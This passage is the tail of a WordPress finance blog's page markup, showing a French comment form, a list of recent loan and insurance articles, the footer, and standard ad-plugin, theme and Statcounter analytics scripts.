for="wp-comment-cookies-consent">Enregistrer mon nom, mon e-mail et mon site dans le navigateur pour mon prochain commentaire.</label></p> <p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Laisser un commentaire" /> <input type='hidden' name='comment_post_ID' value='7730' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /> </p></form> </div><!-- #respond --> </div><!-- #comments --> </main><!-- #main --> <aside id="secondary" class="widget-area"> <section id="recent-posts-2" class="widget widget_recent_entries"> <h2 class="widget-title"><span>Articles récents</span></h2> <ul> <li> <a href="http://leadloan.space/2870.html">Comment calculer le taux d’intérêt des dépôts bancaires et des prêts, et quelle est la différence entre le taux d’intérêt et l’intérêt</a> </li> <li> <a href="http://leadloan.space/2869.html">Qu’est-ce que l’assurance médicale</a> </li> <li> <a href="http://leadloan.space/2866.html">How to negotiate scholarship offers with colleges</a> </li> <li> <a href="http://leadloan.space/2865.html">Comment rembourser l’assurance médicale</a> </li> <li> <a href="http://leadloan.space/2863.html">How do you calculate the cost of medical insurance in the United States</a> </li> <li> <a href="http://leadloan.space/2862.html">How to get Remote Long – term Jobs For Developers</a> </li> </ul> </section></aside><!-- #secondary --> </div> </div> </div><!-- #content --> <footer id="colophon" class="site-footer"> <div class="site-footer-bottom"> <div class="ascendoor-wrapper"> <div class="site-footer-bottom-wrapper"> <div class="site-info"> <span>Copyright © 2024 <a href="http://leadloan.space/">real estate financing</a>City Blog by <a target="_blank" href="https://ascendoor.com/">Ascendoor</a> | Powered by <a href="https://wordpress.org/" target="_blank">WordPress</a>. </span> </div><!-- .site-info --> </div> </div> </div> <script>window.advanced_ads_check_adblocker=function(t){var n=[],e=null;function i(t){(window.requestAnimationFrame||window.mozRequestAnimationFrame||window.webkitRequestAnimationFrame||function(t){return setTimeout(t,16)}).call(window,t)}return i((function(){var t=document.createElement("div");t.innerHTML=" ",t.setAttribute("class","ad_unit ad-unit text-ad text_ad pub_300x250"),t.setAttribute("style","width: 1px !important; height: 1px !important; position: absolute !important; left: 0px !important; top: 0px !important; overflow: hidden !important;"),document.body.appendChild(t),i((function(){var i=window.getComputedStyle&&window.getComputedStyle(t),o=i&&i.getPropertyValue("-moz-binding");e=i&&"none"===i.getPropertyValue("display")||"string"==typeof o&&-1!==o.indexOf("about:");for(var a=0,r=n.length;a<r;a++)n[a](e);n=[]}))})),function(t){null!==e?t(e):n.push(t)}}();</script><script src='http://leadloan.space/wp-content/plugins/advanced-ads-pro/assets/js/advanced-ads-pro.min.js?ver=2.16.1' id='advanced-ads-pro/front-js'></script> <script src='http://leadloan.space/wp-content/themes/city-blog/assets/js/navigation.js?ver=1.0.0' id='city-blog-navigation-script-js'></script> <script src='http://leadloan.space/wp-content/themes/city-blog/assets/js/slick.min.js?ver=1.8.1' id='city-blog-slick-script-js'></script> <script src='http://leadloan.space/wp-content/themes/city-blog/assets/js/custom.min.js?ver=1.0.0' id='city-blog-custom-script-js'></script> <script src='http://leadloan.space/wp-includes/js/comment-reply.min.js?ver=5.7' id='comment-reply-js'></script> <script src='http://leadloan.space/wp-includes/js/wp-embed.min.js?ver=5.7' id='wp-embed-js'></script> <script>window.advads_admin_bar_items = [];</script><script>!function(){window.advanced_ads_ready_queue=window.advanced_ads_ready_queue||[],advanced_ads_ready_queue.push=window.advanced_ads_ready;for(var d=0,a=advanced_ads_ready_queue.length;d<a;d++)advanced_ads_ready(advanced_ads_ready_queue[d])}();</script><!-- Default Statcounter code for googleloan https://googleloan.icu --> <script type="text/javascript"> var sc_project=12959744; var sc_invisible=1; var sc_security="0fdcca33"; </script> <script type="text/javascript" src="https://www.statcounter.com/counter/counter.js" async></script> <noscript><div class="statcounter"><a title="Web Analytics Made Easy - Statcounter" href="https://statcounter.com/" target="_blank"><img class="statcounter" src="https://c.statcounter.com/12959744/0/0fdcca33/1/" alt="Web Analytics Made Easy - Statcounter" referrerPolicy="no-referrer-when-downgrade"></a></div></noscript> <!-- End of Statcounter Code --> </body> </html>